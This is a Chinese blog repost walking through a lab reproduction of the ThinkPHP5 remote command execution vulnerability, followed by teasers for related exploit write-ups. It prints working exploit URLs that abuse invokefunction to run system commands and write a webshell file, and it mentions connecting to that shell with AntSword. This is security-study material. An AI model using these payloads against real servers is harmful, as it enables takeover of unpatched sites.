ThinkPHP5远程命令执行漏洞

7月前作者：背着书包打太极分类：Toy博客阅读(31) 违法举报

这篇具有很好参考价值的文章主要介绍了ThinkPHP5远程命令执行漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

ThinPHP简介

ThinkPHP是一个快速、兼容而且简单的轻量级国产 PHP开发框架，诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkPHP，遵循Apache2开源协议发布，使用面向对象的开发结构和 MVC模式，从Struts结构移植过来并做了改进和完善，同时也借鉴了国外很多优秀的框架和模式。

漏洞产生原因

由于thinkPHP5框架对控制器名没有进行足够的安全检测，导致在没有开启强制路由的情况下，攻击者构造指定的请求，可以直接getshell。

受影响版本

thinkPHP 5.0.x <thinkPHP 5.0.23

thinkPHP 5.1 <thinkPHP 5.1.31

漏洞复现

启动环境

docker-compose build

docker-compose up -d

访问web环境

ThinkPHP5远程命令执行漏洞

代码执行

/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

ThinkPHP5远程命令执行漏洞

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd

ThinkPHP5远程命令执行漏洞

写入一句话

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码

ThinkPHP5远程命令执行漏洞

蚁剑连接

ThinkPHP5远程命令执行漏洞

修复建议：请升级至最新版本

参考链接：ThinkPHP5 远程命令执行漏洞 - ʚɞ无恙 - 博客园文章来源地址https://www.toymoban.com/news/detail-506430.html

到了这里，关于ThinkPHP5远程命令执行漏洞的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接（复现详细过程）

目录漏洞介绍漏洞复现 1.环境搭建 2.漏洞利用 5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。 1.环境搭建使用docker容器搭建漏洞环境，进入漏洞文件所在。 cd vulhub/thinkphp/5.0.2

2024年02月06日
浏览(78)
Thinkphp5.x全漏洞复现分析

我们可以把namespace理解为一个单独的空间，事实上它也就是一个空间而已，子命名空间那就是空间里再划分几个小空间，举个例子：当有多个子命名空间有相同名称类时，不指定使用哪个命名空间的情况下取最后定义的命名空间中的类，比如上面的 dog 取的时 dogC 中的类，在

2024年04月22日
浏览(31)
thinkphp5.0.24反序列化漏洞分析

thinkphp5框架： thinkphp5的入口文件在 publicindex.php ，访问反序列化起点写一个反序列化入口点全局搜索 __destruct() 函数 thinkphp_5.0.24thinkphplibrarythinkprocesspipesWindows.php 中的 __destruct() 函数，调用了removeFiles() 跟进removeFiles()，第163行的file_exists可以触发 __toString 方法全局搜索

2023年04月08日
浏览(34)
ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

前言本节我将分析thinkphp5.0.x 版本的RCE漏洞，根据漏洞的研究模拟挖掘此漏洞的思路本次分析框架下载，由于官方已经下架了相关的下载接口，这里我们用三方下载一份v5.0.22版本的升级中... https://www.codejie.net/5828.html 附赠 thinkphp5.0官方开发手册架构总览 · ThinkPHP5.0完全开

2024年01月18日
浏览(32)
nginxWebUI 远程命令执行漏洞

nginxWebUI是一款图形化管理nginx配置的工具，能通过网页快速配置nginx的各种功能，包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置，配置完成后可以一键生成nginx.conf文件，并控制nginx使用此文件进行启动和重载。nginxWebUI后台提

2024年02月11日
浏览(24)
RCE（远程命令执行）漏洞详解

RCE(remote command/code execute，远程命令执行)漏洞远程代码执行 (RCE) 攻击是指攻击者可以在一个组织的计算机或网络上运行恶意代码。执行攻击者控制的代码的能力可用于各种目的，包括部署额外的恶意软件或窃取敏感数据。远程代码执行攻击通常通过网络应用程序和网络基础

2024年04月10日
浏览(38)
【漏洞复现】锐捷 EWEB auth 远程命令执行漏洞

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

2024年03月12日
浏览(80)
RCE远程命令执行漏洞挖掘思路

1.URL上在 url参数上，不仅仅可能存在ssrf漏洞，也有很大概率存在命令执行，很大可能调用系统命令如curl。 payload例子： index.php?id=2;}phpinfo();/* ttp://www.xxx.com/cmd.php?cmd=phpinfo() 比如访问到如下URL，在jsp后面尝试加参数，比如path（什么参数需要试） http://x.x.x.x:28076/file/dirF

2024年02月01日
浏览(40)
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞

Struts2是一个基于MVC设计模式的Web应用框架，它本质上相当于一个servlet，在MVC设计模式中，Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品，是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与St

2024年01月20日
浏览(35)
蓝凌OA 漏洞学习——treexml.tmpl 远程命令执行漏洞

注：该文章来自作者日常学习笔记，请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与作者无关。目录一、漏洞概述二、影响版本三、资产测绘四、漏洞复现

2024年02月13日
浏览(24)